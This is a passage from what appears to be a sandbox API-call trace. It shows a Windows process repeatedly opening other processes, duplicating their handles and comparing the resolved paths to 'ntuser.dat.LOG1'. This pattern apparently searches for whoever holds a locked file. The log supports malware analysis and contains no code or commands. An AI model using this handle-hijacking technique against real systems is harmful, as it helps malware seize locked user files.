lpExitCode=0x3fed80) returned 1 [0152.106] CloseHandle (hObject=0x670) returned 1 [0152.106] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -8 [0152.106] CloseHandle (hObject=0x680) returned 1 [0152.106] CloseHandle (hObject=0x62c) returned 1 [0152.106] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.106] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.107] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.107] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.108] CloseHandle (hObject=0x670) returned 1 [0152.108] CloseHandle (hObject=0x680) returned 1 [0152.108] CloseHandle (hObject=0x62c) returned 1 [0152.108] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.108] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.109] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.109] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.109] CloseHandle (hObject=0x670) returned 1 [0152.109] CloseHandle (hObject=0x680) returned 1 [0152.109] CloseHandle (hObject=0x62c) returned 1 [0152.110] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.110] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.110] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.111] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.111] CloseHandle (hObject=0x670) returned 1 [0152.111] CloseHandle (hObject=0x680) returned 1 [0152.111] CloseHandle (hObject=0x62c) returned 1 [0152.111] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0152.111] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.112] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.112] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.112] CloseHandle (hObject=0x670) returned 1 [0152.112] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.112] CloseHandle (hObject=0x680) returned 1 [0152.113] CloseHandle (hObject=0x62c) returned 1 [0152.113] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0152.113] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.113] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.113] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.114] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.114] CloseHandle (hObject=0x670) returned 1 [0152.114] CloseHandle (hObject=0x680) returned 1 [0152.114] CloseHandle (hObject=0x62c) returned 1 [0152.114] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0152.114] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.115] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.115] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.116] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.116] CloseHandle (hObject=0x670) returned 1 [0152.116] CloseHandle (hObject=0x680) returned 1 [0152.116] CloseHandle (hObject=0x62c) returned 1 [0152.116] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0152.116] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.117] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.117] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.117] CloseHandle (hObject=0x670) returned 1 [0152.117] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0152.118] CloseHandle (hObject=0x680) returned 1 [0152.118] CloseHandle (hObject=0x62c) returned 1 [0152.118] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0152.118] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x238, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.118] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.119] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.119] CloseHandle (hObject=0x670) returned 1 [0152.119] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.119] CloseHandle (hObject=0x680) returned 1 [0152.119] CloseHandle (hObject=0x62c) returned 1 [0152.119] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x62c [0152.119] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.120] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.120] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.121] CloseHandle (hObject=0x670) returned 1 [0152.121] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.121] CloseHandle (hObject=0x680) returned 1 [0152.121] CloseHandle (hObject=0x62c) returned 1 [0152.121] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x62c [0152.121] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x68, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.121] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.123] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.123] CloseHandle (hObject=0x670) returned 1 [0152.123] CloseHandle (hObject=0x680) returned 1 [0152.123] CloseHandle (hObject=0x62c) returned 1 [0152.123] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x32c) returned 0x62c [0152.123] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.124] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.125] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.125] CloseHandle (hObject=0x670) returned 1 [0152.125] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.126] CloseHandle (hObject=0x680) returned 1 [0152.126] CloseHandle (hObject=0x62c) returned 1 [0152.126] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x32c) returned 0x62c [0152.126] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.126] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.127] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.127] CloseHandle (hObject=0x670) returned 1 [0152.127] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.127] CloseHandle (hObject=0x680) returned 1 [0152.127] CloseHandle (hObject=0x62c) returned 1 [0152.127] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6a4) returned 0x62c [0152.127] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.127] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.128] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.129] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.129] CloseHandle (hObject=0x670) returned 1 [0152.129] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.129] CloseHandle (hObject=0x680) returned 1 [0152.129] CloseHandle (hObject=0x62c) returned 1 [0152.129] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6a4) returned 0x62c [0152.129] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.129] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.130] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.130] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.130] CloseHandle (hObject=0x670) returned 1 [0152.130] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\ntuser.dat.LOG1") returned -10 [0152.130] CloseHandle (hObject=0x680) returned 1 [0152.130] CloseHandle (hObject=0x62c) returned 1 [0152.131] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x62c [0152.131] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.131] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.132] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.132] CloseHandle (hObject=0x670) returned 1 [0152.132] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.133] CloseHandle (hObject=0x680) returned 1 [0152.133] CloseHandle (hObject=0x62c) returned 1 [0152.133] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x62c [0152.133] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.133] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.134] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.134] CloseHandle (hObject=0x670) returned 1 [0152.134] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\ntuser.dat.LOG1") returned -5 [0152.134] CloseHandle (hObject=0x680) returned 1 [0152.134] CloseHandle (hObject=0x62c) returned 1 [0152.135] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x62c [0152.135] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.135] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.136] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.136] CloseHandle (hObject=0x670) returned 1 [0152.137] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.137] CloseHandle (hObject=0x680) returned 1 [0152.137] CloseHandle (hObject=0x62c) returned 1 [0152.137] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x62c [0152.137] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.138] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.139] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.139] CloseHandle (hObject=0x670) returned 1 [0152.139] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.139] CloseHandle (hObject=0x680) returned 1 [0152.139] CloseHandle (hObject=0x62c) returned 1 [0152.139] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x62c [0152.139] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.140] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.140] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.141] CloseHandle (hObject=0x670) returned 1 [0152.141] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.141] CloseHandle (hObject=0x680) returned 1 [0152.141] CloseHandle (hObject=0x62c) returned 1 [0152.141] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x62c [0152.141] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.142] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.143] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.143] CloseHandle (hObject=0x670) returned 1 [0152.143] _wcsicmp (_Str1="\\Google", _Str2="\\ntuser.dat.LOG1") returned -7 [0152.143] CloseHandle (hObject=0x680) returned 1 [0152.143] CloseHandle (hObject=0x62c) returned 1 [0152.143] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x62c [0152.143] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.143] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.144] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.146] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.147] CloseHandle (hObject=0x670) returned 1 [0152.147] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.147] CloseHandle (hObject=0x680) returned 1 [0152.147] CloseHandle (hObject=0x62c) returned 1 [0152.147] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x62c [0152.147] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.147] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.148] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.149] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.149] CloseHandle (hObject=0x670) returned 1 [0152.149] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0152.149] CloseHandle (hObject=0x680) returned 1 [0152.149] CloseHandle (hObject=0x62c) returned 1 [0152.149] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x62c [0152.149] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.149] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.150] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.150] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.150] CloseHandle (hObject=0x670) returned 1 [0152.150] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.150] CloseHandle (hObject=0x680) returned 1 [0152.151] CloseHandle (hObject=0x62c) returned 1 [0152.151] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x62c [0152.151] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.151] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.152] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.152] CloseHandle (hObject=0x670) returned 1 [0152.152] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.152] CloseHandle (hObject=0x680) returned 1 [0152.152] CloseHandle (hObject=0x62c) returned 1 [0152.152] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x174) returned 0x62c [0152.152] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.152] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.153] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.153] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.154] CloseHandle (hObject=0x670) returned 1 [0152.154] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.154] CloseHandle (hObject=0x680) returned 1 [0152.154] CloseHandle (hObject=0x62c) returned 1 [0152.154] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x174) returned 0x62c [0152.154] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.155] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.155] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.155] CloseHandle (hObject=0x670) returned 1 [0152.155] _wcsicmp (_Str1="\\Java", _Str2="\\ntuser.dat.LOG1") returned -4 [0152.155] CloseHandle (hObject=0x680) returned 1 [0152.155] CloseHandle (hObject=0x62c) returned 1 [0152.155] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e8) returned 0x62c [0152.156] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.156] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.157] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.157] CloseHandle (hObject=0x670) returned 1 [0152.157] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.157] CloseHandle (hObject=0x680) returned 1 [0152.157] CloseHandle (hObject=0x62c) returned 1 [0152.157] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e8) returned 0x62c [0152.157] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, 